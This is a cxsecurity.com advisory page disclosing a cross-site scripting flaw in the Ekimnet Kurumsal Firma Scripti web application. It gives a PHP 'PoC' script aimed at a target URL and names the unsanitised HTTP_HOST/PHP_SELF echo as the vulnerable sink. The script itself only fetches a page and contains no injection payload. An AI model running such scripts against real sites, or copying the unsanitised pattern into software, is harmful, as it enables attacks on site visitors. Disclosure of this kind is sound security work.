Ekimnet Kurumsal Firma Scripti // Cross Site Scripting

2019.10.19
tr z3r0fy (TR) tr
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#!/usr/bin/php -f <?php ################################################################## # Exploit TÄ°tle : Ekimnet Kurumsal Firma Scripti XSS # Venedor Homepage : https://ekimnet.com/ # Software Link : https://ekimnet.com/2018-07-21_01-13-17/ # # Author : z3r0fy # www.bighatz.org - www.bugcontainer.gq # # Using PoC : php -f poc.php http://yourtarget.com ################################################################## /* DESCRIPTION Userinput reaches sensitive sink. Check index.php 18: echo echo $url; // fonksiyon.php 6: $url = "http://" . $_SERVER['HTTP_HOST'] . dirname($_SERVER['PHP_SELF']); // fonksiyon.php */ // // HTTP SERVER, // $target = $argv[1]; $ch = curl_init(); curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_URL, "http://$target/fonksiyon.php"); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"); curl_setopt($ch, CURLOPT_TIMEOUT, 3); curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3); curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3); curl_setopt($ch, CURLOPT_COOKIEJAR, "/tmp/cookie_$target"); $buf = curl_exec ($ch); curl_close($ch); unset($ch); echo $buf; ?>

References:

http://bugcontainer.gq/kutuphane/kurumsal-firma-scripti-xss.txt


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top